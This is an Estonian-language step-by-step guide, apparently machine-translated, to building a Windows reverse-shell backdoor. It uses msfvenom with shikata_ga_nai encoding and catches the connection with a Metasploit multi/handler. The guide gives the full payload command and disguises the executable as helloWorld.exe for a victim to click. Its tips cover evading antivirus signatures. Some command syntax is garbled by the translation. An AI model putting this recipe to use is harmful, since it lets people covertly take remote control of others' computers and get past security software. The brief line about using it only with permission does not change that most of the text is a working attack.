Tagaukse kasutatakse turvamehhanismidest mööda minemiseks, sageli salaja ja enamasti tuvastamatult. Kasutades msfpayloadi ja msfencode'i kombinatsiooni MSFvenom, on võimalik luua tagauks, mis ühendab ründajaga tagasi, kasutades tagasikäigu TCP -d. Tagaukse arendamiseks peate viirusetõrjetarkvara vältimiseks muutma oma pahavara allkirja. Lõpetage see projekt paaril arvutil, millele teil on luba juurde pääseda. Selle käigus saate rohkem teavet arvuti turvalisuse ja selle tagaukse toimimise kohta.
Sammud
Samm 1. Käivitage Kali ja käivitage terminalikonsool
Samm 2. Liidese kuvamiseks tippige ifconfig ja kontrollige oma IP -aadressi
Samm 3. Sisestage kodeerijate loendi kuvamiseks msfvenom -l kodeerijad
Kooderina kasutate x86/shikata_ga_nai
Samm 4. Tippige "msfvenom -a x86 -platvorm aknad -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -platvormaknad tähistavad kasutatavat arhitektuuri.
- -p windows/shell/reverse_tcp määrab manustatavad kasulikud koormused.
- LHOST määrab kuulaja IP -aadressi.
- LPORT tähistab kuulajaporti.
- -b "\ x00" tähistab halva iseloomu (null baiti) vältimist.
- -e x86/shikata_ga_nai tähistab kodeerijate nime.
- -f exe> helloWorld.exe tähistab vormingu väljundit.
Samm 5. Metasploiti aktiveerimiseks tippige msfconsole
Nüüd olete oma tagaukse loonud. Kui ohver klõpsab saidil helloWorld.exe, aktiveeritakse manustatud kesta kasulik koormus ja loob ühenduse teie süsteemiga. Ühenduse saamiseks peate Metasploitis avama multikäitleja ja määrama kasulikud koormused
Samm 6. Tippige use exploit/multi/handler
Samm 7. Tippige set payload windows/shell/reverse_tcp
Samm 8. Mooduli kontrollimiseks tippige show options
Samm 9. Tüüpikomplekt LHOST 192.168.48.129
"LHOST" tähistab kuulaja IP -aadressi
Samm 10. Sisestage komplekt LPORT 4444
"LPORT" tähistab kuulajaporti
Samm 11. Tippige käsk run ja oodake ühendust ohvri masinast
Samm 12. Oodake, kuni ohver klõpsab saidil helloWorld.exe
Seejärel ühendatakse teid edukalt ohvri masinaga.
Näpunäiteid
- Kasutades -i MSFvenomis, kujutatakse kodeeringu iteratsioone. Mõnikord võivad rohkem iteratsioonid aidata AV -tarkvarast kõrvale hiilida.
- Olete õppinud tagaukse genereerimist ja MSFvenomi abil kodeerimist, kuid see meetod ei tööta tänapäeval mõne AV -tarkvara vastu ideaalselt. Selle põhjuseks on MSFvenomi rakendusmallid. AV -müüjad on lisanud nende mallide staatilise allkirja ja lihtsalt otsige neid. Selle probleemi lahendus on kasutada erinevat täitmis malli või erinevaid tööriistu.